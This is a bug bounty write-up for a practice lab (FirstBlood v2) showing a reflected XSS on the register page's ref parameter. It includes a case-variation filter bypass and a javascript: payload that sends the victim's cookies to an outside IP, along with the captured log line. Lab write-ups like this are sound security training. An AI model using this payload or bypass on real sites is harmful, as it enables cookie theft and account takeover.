FirstBlood-#759 — Reflected XSS on register.php leads to account takeover
This issue was discovered on FirstBlood v2
On 2021-10-28, vigilante Level 4 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary:
There is a reflected XSS on /register.php page that was vulnerable in V1 and can easily be reproduced in V2.
The script executes when a user clicks on the "Return to previous page" button.
V2 of First Blood substitutes the words "javascript" with "nope". This can be bypassed by using "jaVaScript".
This vulnerability can be used for account takeover by stealing user's cookies if the user is logged in.
Steps to Reproduce:
- Visit /register.php?ref=jaVaScript:alert(document.domain) and click on "Return to previous page".
- The XSS will fire and you'll see an alert box with the document domain.
- We can then steal cookies. I am running a python http server on a VPS box that captures the header and url.
- Use this payload to steal cookies which send them to my server, navigate to the url again and click on "Return to previous page".
- Captured request.
85.160.6.99 - - [28/Oct/2021 06:45:32] "GET /drps=1d6b68c2ab7581821c793d361 HTTP/1.1" 404 -
Impact
We are able to execute javascript on behalf of a victim that leads to stealing cookies and account takeover.
P3 Medium
Endpoint: /register.php
Parameter: ?ref=
Payload: jaVaScript:window.location.href=`http://165.227.134.100/${document.cookie}`
FirstBlood ID: 32
Vulnerability Type: Reflective XSS
The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.